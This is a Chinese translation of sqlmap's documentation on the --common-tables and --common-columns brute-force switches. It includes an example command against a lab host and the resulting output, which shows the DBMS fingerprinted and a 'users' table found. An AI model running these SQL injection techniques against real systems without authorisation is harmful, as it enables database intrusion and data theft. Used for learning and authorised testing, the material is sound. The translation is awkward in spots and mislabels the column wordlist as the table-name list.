SqlMap中文版使用教程3.11 SqlMap用法—暴力破解
這些開關可用于運行暴力檢查。
3.11.1.暴力破解表名稱
開關: --common-tables
在某些情況下,--tables不能使用switch 來檢索數據庫的表名。這些情況通常屬于以下類別之一:
- 數據庫管理系統是MySQL < 5.0,
information_schema不可用。 - 數據庫管理系統是Microsoft Access,系統表
MSysObjects不可讀-默認設置。 - 會話用戶沒有針對存儲數據庫方案的系統表的讀取特權。
如果前兩種情況中的任何一種適用,并且您提供了switch --tables,則sqlmap會提示您一個問題,以退回到該技術。這兩種情況均適用于您的情況,如果您將sqlmap提供給switch,則sqlmap仍然可以識別一些現有表--common-tables。sqlmap將執行暴力攻擊,以檢測整個DBMS中是否存在公用表。
公用表名稱的列表是txt/common-tables.txt,您可以根據需要對其進行編輯。
針對MySQL 4.1目標的示例:
$ python sqlmap.py -u "http://192.168.136.129/mysql/get_int_4.php?id=1" --commo
n-tables -D testdb --banner
[...]
[hh:mm:39] [INFO] testing MySQL
[hh:mm:39] [INFO] confirming MySQL
[hh:mm:40] [INFO] the back-end DBMS is MySQL
[hh:mm:40] [INFO] fetching banner
web server operating system: Windows
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS operating system: Windows
back-end DBMS: MySQL < 5.0.0
banner: '4.1.21-community-nt'
[hh:mm:40] [INFO] checking table existence using items from '/software/sqlmap/tx
t/common-tables.txt'
[hh:mm:40] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 8
[hh:mm:43] [INFO] retrieved: users
Database: testdb
[1 table]
+-------+
| users |
+-------+
3.11.2.暴力破解列名稱
開關: --common-columns
對于每個表,在某些情況下--columns不能使用switch 來檢索數據庫表的列名。這些情況通常屬于以下類別之一:
- 數據庫管理系統是MySQL < 5.0,
information_schema不可用。 - 數據庫管理系統是Microsoft Access,其中系統表內部不提供此類信息。
- 會話用戶沒有針對存儲數據庫方案的系統表的讀取特權。
如果前兩種情況中的任何一種適用,并且您提供了switch --columns,則sqlmap會提示您一個問題,以退回到該技術。這兩種情況均適用于您的情況,如果您將sqlmap提供給switch,則sqlmap仍然可以識別一些現有表--common-columns。sqlmap將執行暴力攻擊,以檢測DBMS中是否存在公共列。
公用表名稱的列表是txt/common-columns.txt,您可以根據需要對其進行編輯。
推薦文章: